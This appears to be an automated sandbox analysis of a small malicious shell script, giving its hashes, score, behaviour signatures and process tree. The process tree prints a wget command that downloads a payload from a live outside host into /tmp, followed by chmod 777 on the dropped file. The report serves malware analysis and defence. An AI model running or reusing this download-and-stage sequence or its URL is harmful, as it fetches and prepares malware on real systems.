Analysis

  • max time kernel
    1s
  • max time network
    20s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    14-11-2024 02:46

General

  • Target

    890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh

  • Size

    538B

  • MD5

    8a16d10e22250a89ce00b7e4eaf40ec7

  • SHA1

    ffdf9336427fe2ac3840a79ee5cad114da82b61d

  • SHA256

    890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa

  • SHA512

    2e8a99c289f94d7eea75e5c7de551d3b4fe406281efd7dddf530b4492d7e58049f781c5ba781838505357a742a8e6bdc1a4620a08df76aaffe9ac7c611968161

Score
7/10

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Writes file to tmp directory 2 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh
    /tmp/890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh
    1⤵
      PID:652
      • /usr/bin/dirname
        dirname -- /tmp/890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh
        2⤵
          PID:656
        • /bin/mktemp
          mktemp
          2⤵
          • Writes file to tmp directory
          PID:663
        • /usr/bin/wget
          wget -O /tmp/tmp.FgjxKrP7S1 https://cryptor.live/crypt/ct872/api/6c32NmxVIhq5PMiRqFtg3YtQapLydYti --header "Host: cryptor.biz" --no-check-certificate --retry-connrefused "--waitretry=1" "--read-timeout=20" "--timeout=15" -t 0
          2⤵
          • Writes file to tmp directory
          PID:665
        • /bin/chmod
          chmod 777 /tmp/2.jpg
          2⤵
          • File and Directory Permissions Modification
          PID:676

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads